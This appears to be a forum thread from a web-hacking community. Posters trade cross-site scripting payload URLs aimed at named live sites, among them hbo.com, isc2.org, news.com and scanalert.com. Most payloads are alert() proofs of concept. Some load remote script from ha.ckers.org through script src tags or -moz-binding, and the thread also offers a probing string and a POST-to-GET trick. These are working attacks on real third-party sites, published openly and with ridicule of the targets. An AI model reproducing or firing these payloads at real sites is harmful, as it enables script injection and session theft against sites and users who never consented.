This one is interesting because it really is a DOM based XSS (not reflected). Scanners would have a tough time with this one. http://www.hbo.com/scripts/video/vidplayer_set.html?movie=/av/events/psa/ncta_psa+section=events+num=1115404066482+title=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%20PSA:%20%22From%20A%20Distance%22:%20Visit%20www.controlyourtv.org+tunein=

I can't read swedish but I think this is a big site: http://www.hemnet.se/bevakning/BevLogin.asp?service=hemnet&type=bev&action=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&username=&email=&reklam=N&htmlmail=N&error=-2&

wow.. i was gone for a day, and you guys managed to fill up more than a page of posts in this thread.. not to mention being /.'ed ^^

well good job on all of it, i'm glad to see this forum getting more recognition, which'll hopefully bring in more web app sec experts (and web app sploit experts) ..

digital64: the http regex is easily fixed by changing all the " to %22 (and space to %20).. i.e.:
h**p://www.beliefnet.com/search/search_site_results.asp?search_for=%22><script src=http://ha.ckers.org/s.js></script>&to_search=whole_site -> http://www.beliefnet.com/search/search_site_results.asp?search_for=%22><script%20src=http://ha.ckers.org/s.js></script>&to_search=whole_site

and as for the test injection i use: asdf'a"s>d<f>g;!-e=+r)(t%y\u/i i
why all the letters in between? because when the website \escapes alot of the special characters.. its harder for me to tell which ones when mashed together like ';!--"/>\< .. and i look for the 'asdf' ... but whenever i just randomly throw it into a website im visiting, its usually asdf'e"r>t<y> .. because it's fast to type.

kyran: i thought i should do the same for quicker reference, to throw into a sql database including the fields: TLD, vector, vector type, site category, and filter type .. but then i remembered i'm lazy with too many half done projects =__=

and since we've been giving other sites the same treatment for mentioning sla.ckers:
http://www.ddj.com/TechSearch/not_found.jhtml;jsessionid=1BKYW43EIVWIKQSNDLRCKH0CJUNN2JVN?nftype=error&queryText=%22;alert(%22XSS%22);%22&site_id=3600005&_requestid=190824

i'll save myself the effort of checking slashdot though.. won't be as easy to find one.

kyran, although i think you said you use opera .. (in which i recommend opera8.54, because its the only view source that shows the changes, if the site/page.pl name doesn't change)

..but the WebDeveloper extension for firefox has an extremely useful feature for converting all POSTs to GETs .. as most POSTs still work, when submitted as GET

to expand on your find: http://news.com.com/2114-1038-6119515.html?toEmailAddress=%22%3EXSS+is+here%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cbr+%22&fromEmailAddress=%22%3EXSS+here+too%3Cscript%3Ealert%28%22XSS2%22%29%3C%2Fscript%3E%3Cbr+%22&comments=and+here%3F%3C%2Ftextarea%3E%3Cscript%3Ealert%28%22XSS3%22%29%3C%2Fscript%3E&CAPTCHA_RESPONSE=&CAPTCHA_GUID=8a8f128e0dcbac55010deb0f55616c91

With all the media attention on XSS now, one would think that people would act on this information. But we still find XSS vulnerabilities in major sites, even ones that report on XSS being an issue! The problem is that most web developers have no security training at all.

It seems "Email to a friend"-style pages are almost always vulnerable to it.

kirke: that works in IE and opera .. but not firefox, because the ending " in the link is unnecessary (the site adds one in too)

good work though, and it's sad to see who passes themselves off as web application security consultants and experts these days =.= .. their associates degree in web design and https://www.isc2.org/cgi-bin/login.cgi?Command=TempPassword&CertificateNumber=%3Cscript%3Ealert%28%22Yes%2C+this+is+the+International+Information+System+Security+Certification+Consortium.+And+Yes%2C+they+should+probably+uncertify+themselves..%22%29%3C%2Fscript%3E&LastName=&HomeCity=&x=9&y=8 membership is hardly worth the paper the check was written on to buy them. I'm not really sure what they spend their time doing during their 'audits' .. but this is stuff i could likely teach a ten year old to find, after two hours of explaining.

This is in no offense to the legitimately well-informed webappsec professionals out there, but you're about as rare as an xss-free site - and we all know how rare that is..

some more scanalert ones: https://www.scanalert.com/Content.sa?sec=2&sub=4&send=Y&ref=&rid=&region=EN&name=XSS0%22+onmouseover%3D%22alert%28%27XSS0%27%29%22+style%3D%22-moz-binding%3Aurl%28%27http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%27%29%22%3E%3Cx%22&company=XSS1%22+onmouseover%3D%22alert%28%27XSS1%27%29%22+style%3D%22-moz-binding%3Aurl%28%27http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%27%29%22%3E%3Cx%22&url=XSS2%22+onmouseover%3D%22alert%28%27XSS2%27%29%22+style%3D%22-moz-binding%3Aurl%28%27http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%27%29%22%3E%3Cx%22&phone=XSS3%22+onmouseover%3D%22alert%28%27XSS3%27%29%22+style%3D%22-moz-binding%3Aurl%28%27http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%27%29%22%3E%3Cx%22&ext=XSS4%22+onmouseover%3D%22alert%28%27XSS4%27%29%22+style%3D%22-moz-binding%3Aurl%28%27http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%27%29%22%3E%3Cx%22&email=XSS5%22+onmouseover%3D%22alert%28%27XSS5%27%29%22+style%3D%22-moz-binding%3Aurl%28%27http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%27%29%22%3E%3Cx%22 automagic in FF, mouseover any field in other browsers